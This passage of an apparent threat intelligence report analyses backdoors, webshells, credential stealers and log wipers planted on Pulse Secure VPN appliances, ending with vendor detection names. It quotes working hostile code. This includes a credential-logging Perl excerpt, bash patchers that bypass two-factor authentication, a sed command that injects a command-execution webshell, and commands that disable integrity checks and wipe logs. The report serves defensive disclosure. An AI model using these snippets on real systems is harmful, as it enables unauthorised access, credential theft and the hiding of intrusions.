alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" jsname='P3Vluc' 
jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 7: Webshells respond to POSTs</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>All incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The first six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended. This nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then used to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:</p> <p>Outbound/Inbound:</p> <p>&lt;6randbytes&gt;<br>^-RC4NONCE-^</p> <p>Usage:</p> <p>&lt;6randbytes&gt;<br>^-------RC4 KEY--------^</p> <p><em>ReadFile</em></p> <p>This command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. 
The file contents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers "Content-type: application/x-download\n", and form header "Content-Disposition: attachment; filename=tmp\n\n".</p> <p><em>WriteFile</em></p> <p>This command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4 encrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file before the file is closed. The results of this command are sent back to the attacker, using the headers "Cache-Control: no-cache\n" and "Content-type: text/html\n\n".</p> <p><em>Execute</em></p> <p>This command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids the cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system API with output piped to the file /tmp/1. The full system command is &gt;/tmp/1 2&gt;&amp;1. The output of this execution is read and sent back to the attacker base64 encoded, RC4 encrypted. The headers &quot;Cache-Control: no-cache\n&quot; and &quot;Content-type: image/gif\n\n&quot; are used. The response appears to be masquerading as a GIF when sending back this command output.</p> <h5>RADIALPULSE</h5> <p>The file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified Perl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated with logins to this application to be written to the file /tmp/dsstartssh.statementcounters.</p> <p>Retrieval of these login credentials must be achieved through other means such as an interactive login or a webshell. 
Persistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure webpage.</p> <p>An excerpt of the code related to credential stealing is shown as follows:</p> <p>my $realmName1 = $signin-&gt;getRealmInfo()-&gt;{name};</p> <p>open(*fd, &quot;&gt;&gt;/tmp/dsstartssh.statementcounters&quot;);</p> <p>syswrite(*fd, "realm=$realmName1 ", 5000);</p> <p>syswrite(*fd, "username=$username ", 5000);</p> <p>syswrite(*fd, "password=$password\n", 5000);</p> <p>close(*fd);</p> <h5>SLOWPULSE Variant 1</h5> <p>The file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a trojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific authentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently subvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. If the backdoor password is not used, authentication will fail as normal.</p> <p>In multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very small, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding regions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all flags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able to execute as a passive observer if desired, only affecting the control flow in specific conditions. 
This is employed in two locations, the LDAP and RADIUS authentication routines, DSAuth::LDAPAuthServer::authenticate and DSAuth::RadiusAuthServer::checkUsernamePassword respectively.</p> <p><em>LDAP Auth Bypass</em></p> <p>In the typical execution of DSAuth::LDAPAuthServer::authenticate the legitimate application constructs the C++ object DSAuth::LDAPAuthServer::ldap then passes it to DSLdapServer::bind with the username and password for login. This bind may fail or succeed, which determines the authentication failure or success of the LDAP protocol. The malicious logic inserted into the application redirects execution before DSLdapServer::bind, just after the ldap object is constructed. At this point in execution the username and password are easily extracted from memory with mid-function hooking techniques; the sample copies them to a code cave in memory between two functions as a temporary storage location. The malicious logic then invokes DSLdapServer::bind as the normal logic would, which sets the return register EAX to 0 or 1 for failure or success. A check is then executed where the temporary password copy made earlier is compared against a hardcoded backdoor password. If this check passes, the backdoor logic activates by overwriting EAX with 1 to force the application down the execution path of successful authentication, even though in reality authentication failed.</p> <h5>RADIUS Two Factor Auth Bypass</h5> <p>In the typical execution of DSAuth::RadiusAuthServer::checkUsernamePassword the legitimate application sends a RADIUS-2FA auth packet with username and password via RadiusAuthPacket::sendRadiusPacket. The response is then retrieved and parsed by the routine DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is verified to be 3; it is not known what this packet type specifies, but this is the packet type of a successful authentication response. 
If the packet type check passes, then the sample reads a field of the packet that specifies whether authentication was successful and checks this status later. The inserted malicious logic hijacks execution just after DSAuth::RadiusAuthServer::handleResponse, where the password sent to the RADIUS server is checked against a backdoor password. If this check passes, the malicious logic overwrites the retrieved packet with values indicating that it is of type 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet type is checked. If written, the spoofed values force the application down the execution path of successful authentication, even though in reality authentication failed.</p> <h5>SLOWPULSE Variant 2</h5> <p><em>ACE Two Factor Auth Credential Logging</em></p> <p>We also identified a variant of SLOWPULSE (SHA256: 1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used during ACE-2FA protocol authentication.</p> <p>The backdoor is implemented in the routine DSAuth::AceAuthServer::checkUsernamePassword. As part of the login procedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an unconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then writes them to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\n. The backdoor then unconditionally jumps back into the normal control flow to continue the logon process as normal.</p> <h5>SLOWPULSE Variant 3</h5> <p><em>ACE Two Factor Auth Bypass</em></p> <p>We identified another variant of SLOWPULSE (SHA256: b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE Variant 2 in that the malicious logic lives within DSAuth::AceAuthServer::checkUsernamePassword; however, this variant bypasses the logon procedure rather than logging login credentials. 
Typical execution of this routine calls DsSecID_checkLogin to validate the username and password, which sets the EAX register to 1. The routine DSAuth::AceAuthServer::handleACEAuthResult then checks EAX to determine whether auth was successful. The malicious logic hijacks execution immediately after the username and password fields are written to their map entries, then checks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten with 1. This puts the program in the same state as if DsSecID_checkLogin had successfully executed, but unlike SLOWPULSE Variant 1 the original authentication routine is not called at all. The malicious logic then rejoins execution before DSAuth::AceAuthServer::handleACEAuthResult, which will now pass. This forces the application down the execution path of successful authentication, even though in reality authentication would have failed.</p> <h5>SLOWPULSE Variant 4</h5> <p><em>RealmSignin Two Factor Auth Bypass</em></p> <p>We identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of the DSAuth::RealmSignin process. The backdoor is present within the function DSAuth::RealmSignin::runSigninStep. This routine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of the switch statement typically calls the routines DSMap::setPrivacyKeyNames then DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant overwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if DSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with these patches applied, as the attacker removed their patches after use. However, we did uncover both the patcher and unpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. 
This analysis was performed by replaying the changes performed by the patcher we did recover.</p> <h5>SLOWPULSE Variant 2 Patcher</h5> <p>As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c is responsible for inserting the SLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments: the path to the original binary and the patched output file path. The original binary is read into memory, patched, and then written to the output path. The assembly patches and offsets into the original binary are hardcoded.</p> <h5>SLOWPULSE Variant 3 Patcher</h5> <p> As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: 06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7 is responsible for inserting the SLOWPULSE V3 malicious logic to bypass the ACE logon authentication process. The patcher accepts four arguments. The first argument is the original binary path, the second the patched output file path, the third is the backdoor bypass password, and the fourth is the letter e, which specifies that the patches should be applied. The sample reads the original binary into memory, applies the assembly patches associated with SLOWPULSE V3 as well as the provided bypass password, and then writes the result to the output path. The assembly patches and all offsets, including where to copy the bypass password, are hardcoded.</p> <h5>SLOWPULSE Variant 4 Patcher</h5> <p>As part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious logic into the original libdsplibs.so file. 
The file with SHA256: e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415 responsible for inserting the patch for SLOWPULSE V3. The patch applied overwrites a single call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in C. The script in full is:</p> <p>printf '\xB8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\x01' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))printf '\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))</p> <h5>SLOWPULSE Variant 4 UnPatcher</h5> <p>As part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove the malicious logic into the original libdsplibs.so file for SLOWPULSE V4. The attacker chose to remove the patches applied to libdsplibs.so. The file with SHA256: b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a is the unpatcher utility for SLOWPULSE V4. 
This sample is also a simple bash script, in full it is:</p> <p>printf '\xE8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\xE2' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\x08' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33))printf '\xD0' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34))printf '\xFF' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))</p> <h5>STEADYPULSE</h5> <p>The file licenseserverproto.cgi (SHA256: 168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a webshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary command execution.</p> <p>The attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by comments that indicate the start and end of inserted code. The comment strings used are ##cgistart1, ##cgiend1, ##cgistart2 and ##cgiend2. Although the exact purpose of these comment strings is unknown, the attacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.</p> <ul> <li>The Perl script enclosed in the tags ##cgistart1 and ##cgiend1 adds several lines to import Perl modules that are used by the webshell. It also adds a function to parse parameters of received command data.</li> <li>The script enclosed in the tags ##cgistart2 and ##cgiend2 is responsible for checking web requests designed to be executed by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl script for the webpage.</li> </ul> <p>The webshell portion of the script is invoked when it receives a form submission name=value pair of serverid matching a secret key. This causes the webshell to extract the string passed to it via the QUERY_STRING CGI environment variable. 
Individual key/value pairs are delimited by the &amp; character and are URL decoded. Although the script parses out all key/value pairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a form containing the extracted cmd to be executed and the previous serverid value, along with a form submission button named Run. Upon submission, the webshell will execute the passed command on the victim host&#39;s command line and display the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output a &lt;/pre&gt; HTML tag.</p> <h5>PULSECHECK</h5> <p>The file secid_canceltoken.cgi (SHA256: a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a webshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute webshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.</p> <p>The script checks for web requests using the HTTP POST method and, if found, will further check the HTTP request headers for the CGI environment variable HTTP_X_KEY. If this header matches a backdoor key, then the malware will output the result of the command sent in the variable HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The passphrase to decrypt is sent in the environment variable HTTP_X_CNT. The webshell sets the content type to Content-type:text/html and prints the command output. Following this, the script exits.</p> <h5>QUIETPULSE</h5> <p>The file dsserver (SHA256: 9f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate Perl script with malicious modifications to fork the child process /home/bin/dshelper. 
The dshelper script does not exist on a clean PulseSecure installation, this file is described as QUIETPULSE Utility Script.</p> <h5>QUIETPULSE Utility Script</h5> <p>The file dshelper (SHA256: c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script invoked by a malicious version of dsserver that primarily functions as a utility script responsible for copying files and executing commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system upgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to execute in a loop where four main checks are executed every two minutes. The checks are as follows:</p> <p><em>Check 1</em></p> <p>If /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi exists and is non-empty then execute:</p> <ul> <li>grep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>It checks if the file has the contents system($depara). If the file does not contain this content, then retrieve the first line of the file by executing:</p> <ul> <li>sed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>Then copy a file via:</p> <ul> <li>cp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p>Then replace the copy’s first line with the one retrieved from the sed above via:</p> <ul> <li>sed -i 1c&quot;&lt;varies&gt;&quot; /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi</li> </ul> <p><em>Check 2</em></p> <p>If /tmp/data/root/home/bin/ exists as a directory, then check if the file /tmp/data/root/home/bin/dshelper does not exist. 
If it does not exist, then place it there by copying a file via:</p> <ul> <li>cp -p /home/bin/dshelper /tmp/data/root/home/bin/</li> </ul> <p><em>Check 3</em></p> <p>If /tmp/data/root/home/bin/dsserver exists and is non-empty then execute the following to check if the file does not contain the string exec("/home/bin/dshelper"):</p> <ul> <li>grep -c -s 'exec("/home/bin/dshelper")' /tmp/data/root/home/bin/dsserver</li> </ul> <p>If it doesn't then execute to insert the line:</p> <ul> <li>sed -i &#39;s/for (;;)/my $monpid = fork();\nif ($monpid == 0) {\nexec(\&quot;\/home\/bin\/dshelper\&quot;);\n}\n&amp;/g&#39; /tmp/data/root/home/bin/dsserver</li> </ul> <p><em>Check 4</em></p> <p>If the file /tmp/data/root/home/bin/check_integrity.sh exists and is non-empty, then check if the file contains the string exit 1 by executing:</p> <ul> <li>grep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh</li> </ul> <p>If the file does contain this content, then execute the following to switch the content to exit 0:</p> <ul> <li>sed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh</li> </ul> <h5>PULSEJUMP</h5> <p>The file with SHA256: 7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a is a system information and credential harvesting Perl script. The sample writes information from multiple sources to the file /tmp/dsactiveuser.statementcounters in append mode.</p> <p>The sample begins by retrieving all auth servers via the API AuthAdmin::getAllAuthServers. and logs the results. Next, the sample logs all roles via the API DSRole::GeneralAdmin::getRoles and writes the values to the file. 
The sample may also retrieve and log additional information depending on the device configuration.</p> <h5>HARDPULSE</h5> <p>The file compcheckjava.cgi (SHA256: 1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the ability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular library function.</p> <p>The sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming requests checkcode POST param is equal to a hardcoded passcode. If this check passes the sample inspects the param hashid to determine if it&#39;s non-empty. If non-empty the sample displays a prompt to the user that includes hardware information and then base64 decodes the param hashid and checks it against pulsesecure. If this matches a recoveryToken is generated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then displayed to the user via the URL https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt; and the sample exits. If this check did not match then the sample passes the base64 decoded data to a routine DSSafe::psystem which may execute shell commands, however this implementation is not provided and is speculation.</p> <p>If the param hashid is empty the sample instead checks that the param m is non-empty. If so, it's matched against get and put which will read/write arbitrary files to the host, respectively.</p> <h5>ATRIUM</h5> <p>The file compcheckresult.cgi (SHA256: f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a webshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic. The malicious logic inspects all requests of any type looking for the HTTP query parameter id. If this query parameter exists, the sample executes it verbatim on using the system API. 
The sample does not encode or obfuscate the command in any way. If the query parameter is not found in the request, then the original legitimate logic is invoked.</p> <h5>Persistence Patcher</h5> <p>The file DSUpgrade.pm (SHA256: 224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a patcher utility script responsible for persisting webshells across a system upgrade. We’ve observed variants of this utility targeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like previous patchers, this sample uses sed to insert malicious logic. The attacker likely chose DSUpgade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the attacker to maintain access to the system across updates.</p> <p>my $cmd_x=&quot;sed -i &#39;/echo_console \&quot;Saving package\&quot;/i(    sed -i \\\&#39;/main();\\\$/cif(CGI::param(\\\\\&quot;id\\\\\&quot;)){        print \\\\\&quot;Cache-Control: no-cache\\\\\\\\n\\\\\&quot;;        print \\\\\&quot;Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\&quot;;        my \\\\\$na=CGI::param(\\\\\&quot;id\\\\\&quot;);        system(\\\\\&quot;\\\\\$na\\\&quot;);    } else{        &amp;main();    }\\\&#39; /tmp/data/root$cgi_p;    cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;    cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)&#39;/pkg/do-install&quot;;</p> <p>The patcher also performs additional shell commands for unpacking a compressed package:</p> <p>system("/bin/mount -o remount,rw /dev/root /");system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");system("cp -f /tmp/installer/do-install /pkg/");system("cp -f /tmp/installer/VERSION /pkg/");system("cp -f /tmp/installer/sysboot-shlib /pkg/");system("cp -f 
/tmp/installer/losetup /pkg/");</p> <h5>PACEMAKER</h5> <p>The file memread (SHA256: 68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential stealer. The sample has the usage information:</p> <p>Usage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]</p> <p>The sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then enters a loop which reads /proc/ entries every 2 seconds looking for a target application, this interval is also configurable. The target is found by opening /proc/&lt;process_name&gt;/cmdline for each entry in the folder and then reading this file looking for the string dswsd within the command line. Once found the target application&#39;s proc/&lt;target_pid&gt;/mem is opened, the process is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string 20 30 20 0A 00 ( 0 \n) is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are expected to be found, and these are immediately converted into hex numbers, example form: -&lt;number&gt;. If the second number minus the first is &gt; 8191 the sample reads the data starting at the file offset of the first number, up to a size specified by second number minus first number.</p> <p>Once the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the sample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to locate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. 
Each item of interest is located by a start sequence and an end sequence; in the order they are scanned for, these are:</p> <p>USER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00<br>USER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00<br>PASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00<br>PASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00<br>AUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00<br>AUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00</p> <p>If all these sequences are found, the data between each start and end sequence is extracted and eventually formatted and written to the file /tmp/dsserver-check.statementcounters. The approximate format of this data is:</p> <p>Name:&lt;username&gt; || Pwd:&lt;password&gt; || AuthNum:&lt;authnumber&gt;\n</p> <p>The sample replaces the following URL encoded values with their ASCII representation in the password:</p> <p>&amp;amp; -&gt; &amp;<br>&amp;lt; -&gt; &lt;<br>&amp;gt; -&gt; &gt;</p> <h5>PACEMAKER Launcher Utility</h5> <p>As part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the credential stealer. The launcher script (SHA256: 4c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec) launches PACEMAKER from a hardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable self-kill time.</p> <p>#!/bin/bash</p> <p>/home/bin/memread -t $1 -m 16 -s 2 &amp;</p> <h5>THINBLOOD Log Wiper Utility</h5> <p>The file dsclslog with SHA256 88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079 is a log wiper utility. The sample provides the usage information:</p> <p>Usage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]</p> <p>The -f flag specifies whether the file log.events.vc0 or log.access.vc0 within the directory /home/runtime/logs should be modified. 
To perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but uses .vc1 and .vc2 as the extensions for the new files. The file with the .vc1 extension is used to search for entries that match the given regexes, and the file with the .vc2 extension is used as a temporary file where the cleaned log is written. After both files are generated and log cleaning is finished, the sample executes the following commands via the system API to overwrite the original log with the cleaned version, then removes the intermediate file:</p> <p>mv /home/runtime/logs/log.&lt;logtype&gt;.vc2 /home/runtime/logs/log.&lt;logtype&gt;.vc0<br>rm /home/runtime/logs/log.&lt;logtype&gt;.vc1</p> <h5>THINBLOOD LogWiper Utility Variant</h5> <p>The file clear_log.sh (SHA256: 1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH script responsible for zeroing log lines that match a given regex pattern. The sample is similar to the compiled THINBLOOD Log Wiper but edits logs in place with sed rather than making temporary copies. The sed commands used are:</p> <p>sed -i &quot;s/.\x00[^\x00]*&lt;regex_string&gt;[^\x00]*\x09.\x00//g&quot; /data/runtime/logs/&lt;logfile&gt;</p> <p>sed -i &quot;s/\x&lt;hex_char&gt;\x00[^\x00]*$2[^\x00]*\x09\x&lt;hex_char&gt;\x00//g&quot; /data/runtime/logs/&lt;logfile&gt;</p> <p>The sample embeds the usage information:</p> <p>usage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]</p> <h5>LOCKPICK</h5> <p>The file libcrypto.so (SHA256: 2610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared object containing cryptographic logic from OpenSSL. The sample contains a modification to the routine bnrand_range that breaks the security of the random numbers generated. There are three paths in this routine for generating a random big number within a given range. 
The first case is unmodified and generates a zeroed big number, the other two cases are patched so that a constant value overwrites the generated random value and always returns success. This breaks the random number generation by replacing it with a value the attacker knows in all cases.</p> <h5>LOCKPICK Patcher</h5> <p>The file with the hash b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4 is a patcher utility responsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity checker script built into the appliance to insert an early exit routine. This is inserted by the command sed -i '12aexit 0' /home/bin/check_integrity.sh which when applied causes this script to exit without performing its intended checks. After this the sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK. This file is different from the other patchers we’ve identified in that it is python and specifically targets system integrity routines.</p> <h4>Detecting the Techniques</h4> <p>The following table contains specific FireEye product detection names for the malware families associated with the exploitation of Pulse Secure VPN device.</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:6.72632%"> <p><strong>Platform(s) </strong></p> </td> <td style="width:93.2945%"> <p><strong>Detection Name </strong></p> </td> </tr> <tr> <td style="width:6.72632%"> <p>Network Security </p> <p>Email 
Security </p> <p>Detection On Demand </p> <p>Malware File Scanning </p> <p>Malware File Storage Scanning </p> <p> </p> </td> <td style="width:93.2945%"> <p>FE_APT_Webshell_PL_HARDPULSE_1 FEC_APT_Webshell_PL_HARDPULSE_1 APT.Webshell.PL.HARDPULSE</p> <p>FE_APT_Trojan_PL_PULSEJUMP_1 FEC_APT_Trojan_PL_PULSEJUMP_1 FE_Trojan_PL_Generic_1</p> <p>FE_APT_Trojan_PL_RADIALPULSE_1 FEC_APT_Trojan_PL_RADIALPULSE_1 FE_APT_Trojan_PL_RADIALPULSE_2 FE_APT_Trojan_PL_RADIALPULSE_3 FEC_APT_Trojan_PL_RADIALPULSE_2 FE_APT_Trojan_PL_RADIALPULSE_4 FEC_APT_Trojan_PL_RADIALPULSE_3 FE_APT_Trojan_PL_RADIALPULSE_5 FE_APT_Tool_SH_RADIALPULSE_1 FEC_APT_Tool_SH_RADIALPULSE_1</p> <p>FE_APT_Trojan_Linux32_PACEMAKER_1 FE_APT_Trojan_Linux_PACEMAKER_1</p> <p>FE_APT_Backdoor_Linux32_SLOWPULSE_1 FE_APT_Backdoor_Linux32_SLOWPULSE_2 FE_APT_Trojan_Linux32_SLOWPULSE_1 FE_APT_Tool_Linux32_SLOWPULSE_1</p> <p>FE_APT_Webshell_PL_STEADYPULSE_1 FEC_APT_Webshell_PL_STEADYPULSE_1 APT.Webshell.PL.STEADYPULSE</p> <p>FE_APT_Trojan_Linux32_LOCKPICK_1</p> <p>FE_Webshell_PL_ATRIUM_1 FEC_Webshell_PL_ATRIUM_1 FE_Trojan_SH_ATRIUM_1</p> <p>FE_APT_Webshell_PL_SLIGHTPULSE_1 FEC_APT_Webshell_PL_SLIGHTPULSE_1 APT.Webshell.PL.SLIGHTPULSE</p> <p>FE_APT_Webshell_PL_PULSECHECK_1 FEC_APT_Webshell_PL_PULSECHECK_1</p> <p>FE_APT_Tool_Linux32_THINBLOOD_1 FE_APT_Tool_Linux_THINBLOOD_1 FE_APT_Tool_SH_THINBLOOD_1 FEC_APT_Tool_SH_THINBLOOD_1 APT.Tool.Linux.THINBLOOD.MVX</p> <p>FE_APT_Trojan_PL_QUIETPULSE_1 FEC_APT_Trojan_PL_QUIETPULSE_1 FE_Trojan_SH_Generic_2 FEC_Trojan_SH_Generic_3</p> <p>Suspicious Pulse Secure HTTP request (IPS)</p> </td> </tr> <tr> <td style="width:6.72632%"> <p>Endpoint Security </p> </td> <td style="width:93.2945%"> <p>Real-Time (IOC)</p> <ul> <li>SLOWPULSE (BACKDOOR)</li> <li>PACEMAKER (LAUNCHER)</li> <li>THINBLOOD (UTILITY)</li> </ul> </td> </tr> <tr> <td style="width:6.72632%"> <p>Helix</p> </td> <td style="width:93.2945%"> <p>VPN ANALYTICS [Abnormal Logon] EXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt] EXPLOIT - SONICWALL ES 
